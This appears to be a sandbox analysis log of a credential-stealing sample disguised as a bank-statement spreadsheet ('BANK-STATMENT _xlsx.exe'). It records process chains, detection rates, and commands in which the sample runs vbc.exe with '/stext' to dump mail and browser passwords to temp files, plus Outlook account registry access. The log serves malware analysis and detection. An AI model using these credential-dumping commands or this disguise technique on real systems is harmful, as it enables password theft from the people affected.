                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: BANK-STATMENT _xlsx.exeVirustotal: Detection: 40%
                Source: BANK-STATMENT _xlsx.exeReversingLabs: Detection: 41%
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2304
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2288
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: unknownProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2304Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2288
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbV source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.806097073.00000000061F0000.00000004.00000001.sdmp
                Source: Binary string: Z[zTs5.pdb6 source: BANK-STATMENT _xlsx.exe, 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp
                Source: Binary string: mscorlib.pdbs\Desktop\BANK-STATMENT _xlsx.exe6 source: BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798860254.000000000097E000.00000004.00000020.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbD source: BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.774857470.0000000006760000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: .pdb* source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbd source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912269653.00000000007FB000.00000004.00000020.sdmp
                Source: Binary string: rlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbh source: BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbg source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp
                Source: Binary string: 1hoC:\Windows\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbc source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798860254.000000000097E000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882931760.0000000000847000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbV source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912269653.00000000007FB000.00000004.00000020.sdmp
                Source: Binary string: tsymbols\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdbENT _xlsx.exe source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbk source: BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
